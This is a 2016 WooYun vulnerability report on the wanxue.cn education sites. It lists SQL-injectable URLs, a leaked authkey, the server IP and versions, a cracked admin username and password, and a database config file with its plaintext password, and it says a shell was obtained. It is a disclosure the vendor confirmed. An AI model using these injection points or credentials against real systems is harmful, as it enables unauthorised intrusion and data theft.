当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168471

漏洞标题:万学教育课堂站点全过程(多处SQL注射++配置不当+漫游后台导致Getshell)

相关厂商:wanxue.cn

漏洞作者: imp0rt

提交时间:2016-01-08 17:41

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

求rank。。。

详细说明:

配置不当 多处注入 信息泄漏 导致getshell 可内网漫游

漏洞证明:

目标站点:
www.wanxue.cn
gwy.wanxue.cn
test:
authkey:
7uiffp16oiqrbqevsclkct6y0cv5r435
主站路径:
http://www.wanxue.cn/admin_wanxue/
/home/wwwroot/inc/config.php
可本地构造authkey注入
注入点:
http://gwy.wanxue.cn/index.php?m=content&c=index&a=cw_list&course_type=1
http://gwy.wanxue.cn/index.php?m=content&c=index&a=show_ptxcvedio&id=185 id=185
http://kaoyan.wanxue.cn/index.php?m=content&c=index&a=lists&catid=496&pc_hash=A2Qxwd catid=496
test:
http://gwy.wanxue.cn/index.php?m=content&c=index&a=cw_list&course_type=1%27
加单引号爆错

MySQL Query : SELECT COUNT(*) AS num FROM `gwy`.`gwy_product` WHERE course_type=1\' and issale=1 LIMIT 1 
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and issale=1 LIMIT 1' at line 1
MySQL Errno : 1064
Message : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and issale=1 LIMIT 1' at line 1
Need Help?


得到表前缀:gwy_xxx

Target: 		http://gwy.wanxue.cn/index.php?m=content&c=index&a=cw_list&course_type=1
Host IP: 124.207.57.250
Web Server: nginx/1.7.3
Powered-by: PHP/5.4.8
DB Server: MySQL
Current DB: gwy


1.png


通过MD5解密为
username:admin password:Adminadmin

2.png


3.png


4.png


内网流可继续哈。。。
数据库信息:

<?php
return array (
'default' => array (
'hostname' => 'localhost',
'database' => 'gwy',
'username' => 'gwy',
'password' => 'wanxue@#$234gwy',
'tablepre' => 'gwy_',
'charset' => 'utf8',
'type' => 'mysql',
'debug' => true,
'pconnect' => 0,
'autoconnect' => 0
),
);
?>


shell已拿。。。不深入测试。。。

修复方案:

你们比我懂。。。

版权声明:转载请注明来源 imp0rt@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-08 17:56

厂商回复:

感谢您的反馈,我们会尽快处理

最新状态:

暂无


漏洞评价:

评价